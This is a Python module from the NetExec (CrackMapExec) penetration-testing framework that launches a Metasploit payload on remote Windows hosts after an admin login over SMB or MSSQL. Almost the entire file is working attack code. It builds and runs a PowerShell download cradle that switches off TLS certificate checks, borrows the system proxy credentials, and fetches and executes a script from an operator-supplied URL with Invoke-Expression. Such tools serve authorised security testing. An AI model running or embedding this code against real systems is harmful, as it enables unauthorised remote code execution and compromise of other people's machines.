NetExec/cme/modules/web_delivery.py

47 lines
1.8 KiB
Python

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sys import exit
class CMEModule:
"""
Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
Reference: https://github.com/EmpireProject/Empire/blob/2.0_beta/data/module_source/code_execution/Invoke-MetasploitPayload.ps1
Module by @byt3bl33d3r
"""
name = "web_delivery"
description = "Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module"
supported_protocols = ["smb", "mssql"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
URL URL for the download cradle
PAYLOAD Payload architecture (choices: 64 or 32) Default: 64
"""
if not "URL" in module_options:
context.log.fail("URL option is required!")
exit(1)
self.url = module_options["URL"]
self.payload = "64"
if "PAYLOAD" in module_options:
if module_options["PAYLOAD"] not in ["64", "32"]:
context.log.fail("Invalid value for PAYLOAD option!")
exit(1)
self.payload = module_options["PAYLOAD"]
def on_admin_login(self, context, connection):
ps_command = """[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('{}');""".format(self.url)
if self.payload == "32":
connection.ps_execute(ps_command, force_ps32=True)
else:
connection.ps_execute(ps_command, force_ps32=False)
context.log.success("Executed web-delivery launcher")